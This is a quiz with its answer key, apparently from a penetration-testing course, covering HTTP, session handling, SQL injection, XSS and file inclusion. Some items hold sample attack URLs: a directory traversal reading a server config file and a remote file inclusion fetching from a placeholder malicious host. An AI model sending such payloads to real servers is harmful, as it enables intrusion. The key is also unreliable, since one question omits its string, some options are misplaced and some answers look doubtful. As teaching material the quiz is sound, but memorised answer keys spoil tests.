6.13.3 Quiz - Performing Post-Exploitation Techniques

Which two functions are provided by a web proxy device? (Choose two.)

• caching of HTTP messages

• scanning a web server for related contents

• translating HTTP messages to FTP and SMTP messages

• enabling HTTP transfers across a firewall

• encrypting HTTP packets transmitted between web clients and web servers

• caching of HTTP messages

• enabling HTTP transfers across a firewall

Match the HTTP status code contained in a web server response to the description.

codes in the 200 range

related to successful transactions

Match the HTTP status code contained in a web server response to the description.

codes in the 300 range

related to HTTP redirections

Match the HTTP status code contained in a web server response to the description.

codes in the 400 range

related to client errors

Match the HTTP status code contained in a web server response to the description.

codes in the 500 range

related to server errors

Match the HTTP status code contained in a web server response to the description.

codes in the 100 range

informational

Which function is provided by HTTP 2.0 to improve performance over HTTP 1.1?

• HTTP 2.0 compresses HTTP messages.

• HTTP 2.0 provides HTTP message multiplexing and requires fewer messages to download web content.

• HTTP 2.0 uses tokens as a mechanism to track web sessions.

• Enabling HTTP transfers across a firewall.

• HTTP 2.0 uses UDP instead of TCP as transport layer protocol.

• HTTP 2.0 provides HTTP message multiplexing and requires fewer messages to download web content.

Why should application developers change the session ID names used by common web application development frameworks?

• These session ID names are not published in public documents.

• These session ID names can be used to fingerprint the application framework employed.

• These session ID names are used randomly and make integration of frameworks impossible.

• These session ID names typically contain a short length of numerical numbers and can be easily cracked.

• These session ID names can be used to fingerprint the application framework employed.

A user is using an online shopping website to order laptop computers. Which mechanism is used by the shopping site to securely maintain user authentication during shopping?

• IP address

• session ID

• username and password

• one-time password assigned

• session ID

What is the best mitigation approach against session fixation attacks?

• Ensure that the session ID uses at least 64 bits of characters.

• Ensure that the session ID is used after a user completes authentication.

• Ensure that the session ID is exchanged only though an encrypted channel.

• Ensure that the session ID changes from the default session name used by the web application framework.

• Ensure that the session ID is exchanged only though an encrypted channel.

Which two attributes can be set in a web application cookie to indicate it is a persistent cookie? (Choose two.)

• Expires

• Max-Age

• Domain

• Secure

• Path

• Expires

• Max-Age

Which international organization is dedicated to educating industry professionals, creating tools, and evangelizing best practices for securing web applications and underlying systems?

• Common Vulnerabilities and Exposures (CVE)

• Open Web Application Security Project (OWASP)

• Institution of Electrical and Electronics Engineering (IEEE)

• SysAdmin, Audit, Network and Security (The SANS Institute)

• Open Web Application Security Project (OWASP)

Which component in the statement below is most likely user input on a web form?

SELECT * FROM group WHERE attack = ‘network’ AND a-type LIKE ‘ping%’;

• ping

• group

• attack

• a-type

• network

• ping

Which statement describes an example of an out-of-band SQL injection attack?

• An attacker launches the attack on a web site and forces the web application to delay the query results.

• An attacker launches the attack on a web site and views the query results immediately on the screen.

• An attacker launches the attack on a web site and reconstructs the information by sending specific SQL statements.

• An attacker launches the attack on a web site and forces the web application to send the query results via an email.

• An attacker launches the attack on a web site and forces the web application to send the query results via an email.

A threat actor launches an SQL injection attack against a web site by sending multiple specific statements to the web site and reconstructing the key information the threat actor seeks. What type of SQL injection attack is the threat actor using?

• blind

• in-band

• error-based

• out-of-band

• blind

An attacker launches an SQL injection attack on a web application by trying to force the application requesting the back-end database to perform multiple SELECT queries. Which technique exploits the SQL injection vulnerability on the web application?

• Boolean

• Error-based

• Out-of-band

• Union operator

• Time delay

• Union operator

Which type of SQL query is in the SQL statement select * from users where user = “admin”;?

• static query

• stacked query

• out-of-band query

• parameterized query

• static query

A company uses the Microsoft Active Directory service to manage the authentication and authorization of employee workstations. The company hires a cybersecurity professional to perform compliance penetration testing. Which type of penetration testing can be used to verify the proper configuration of the Active Directory service?

• LDAP injection

• SQL Union injection

• HTTP command injection

• Stacked query SQL injection

• LDAP injection

What is a potentially dangerous web session management practice?

• including the session ID in the URL

• setting a cookie with the Expires attribute

• setting a cookie with the Max-Age attribute

• configuring a cookie with the HTTPOnly flag

• including the session ID in the URL

A web application configures client cookies with the HTTPOnly flag. What is the effect of this flag?

• It informs the web client that the cookie is a persistent cookie.

• It forces the web browser to have the cookies processed only by the server.

• It requires the web browser to establish a secure HTTPS link to the server.

• It indicates to the web browser that web client-based code can access the cookie.

• It forces the web browser to have the cookies processed only by the server.

An organization has developed a network security policy stating that newly purchased routers and switches must be configured with advanced security measures before deploying them to the production network. Which threat does this policy mitigate?

• Redirect attack

• Session hijacking

• Kerberos vulnerability

• Default credential attack

• Default credential attack

An attacker sends a request to an online university portal site with the information:

SELECT * FROM group WHERE attack = ‘network’ AND a-type LIKE ‘ping%’;

Which type of vulnerability does the attacker try to exploit?

• redirect

• session hijacking

• default credential

• HTTP parameter pollution

• HTTP parameter pollution

A company has hired a cybersecurity firm to assess web server security posture. To test for cross-site scripting vulnerabilities, the tester will use the string. Where would the tester use the string?

• in an HTTP header

• in an error message

• in a terminal window on the server

• in a user input field in a web form

• in a user input field in a web form

According to OWASP, which three statements are rules to prevent XSS attacks? (Choose three.)

• Use the HTML tag with JavaScript encoding.

• Use HTTPS only mode for accessing web applications.

• Use HTML escape before inserting untrusted data into HTML element content.

• Use the HTML img tag with a combination of hexadecimal HTML character references.

• Use attribute escape before inserting untrusted data into HTML common attributes.

• Use JavaScript escape before inserting untrusted data into JavaScript data values.

• Use HTML escape before inserting untrusted data into HTML element content.

• Use attribute escape before inserting untrusted data into HTML common attributes.

• Use JavaScript escape before inserting untrusted data into JavaScript data values.

After some reconnaissance efforts, an attacker identified a web server hosted on a Linux system. The attacker then entered the URL shown below,

http://192.168.46.82:45/vulnerabilities/fi/?page=../../../../../etc/httpd/httpd.conf

Which type of web vulnerability is being exploited by the attacker?

• stored XSS

• reflected XSS

• directory traversal

• cookie manipulation

• directory traversal

An attacker enters the following URL to exploit vulnerabilities in a web application:

http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/cookie.html

Which type of vulnerability did the attacker try to exploit?

• directory traversal

• cookie manipulation

• local file inclusion

• remote file inclusion

• remote file inclusion

Because of an insecure code practice, an attacker can leverage and completely compromise an application or the underlying system. What insecure code practice enabled this catastrophic threat?

• lack of error handling

• use of hard-coded credentials

• overly verbose error handling

• comments that contain too much information

• use of hard-coded credentials

What is the best practice to mitigate the vulnerabilities from a lack of proper error handling in an application?

• Use only a minimum set of error messages.

• Use a strong algorithm to encrypt the transmission of error messages.

• Use a well-thought-out scheme to provide meaningful error messages to the users but no useful information to an attacker.

• Use a third-party hosting service to provide coded error messages and transmit them securely to users, software developers, and support staff.

• Use a well-thought-out scheme to provide meaningful error messages to the users but no useful information to an attacker.